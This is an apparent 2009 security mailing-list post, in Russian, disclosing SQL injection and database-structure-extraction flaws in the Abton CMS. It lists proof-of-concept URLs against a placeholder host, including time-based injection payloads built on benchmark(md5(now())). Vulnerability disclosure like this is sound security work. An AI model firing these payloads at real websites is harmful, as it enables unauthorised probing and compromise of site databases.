Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SECURITY] [DSA 1938-1] New php-mail packages fix insufficient input sanitising

[SECURITY] [DSA 1937-1] New gforge packages fix cross-site scripting

[Bkis-13-2009] e107 Multiple Vulnerabilities

Vulnerabilities in plugins for WordPress

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	25.11.2009
Subject:	Vulnerabilities in Abton

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL DB Structure Extraction и SQL Injection уязвимостях в Abton (это
украинская CMS).

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/’/

http://site/rus/’/

http://site/rus/referaty/1/-1/

http://site/abton/

SQL Injection:

http://site/rus/details/’+benchmark(10000,
md5(now()))+’/

http://site/rus/referaty/1?+benchmark(10000,md5(now()))-
’1/

http://site/rus/’+benchmark(10000,md5(now()))+’/

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2886/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua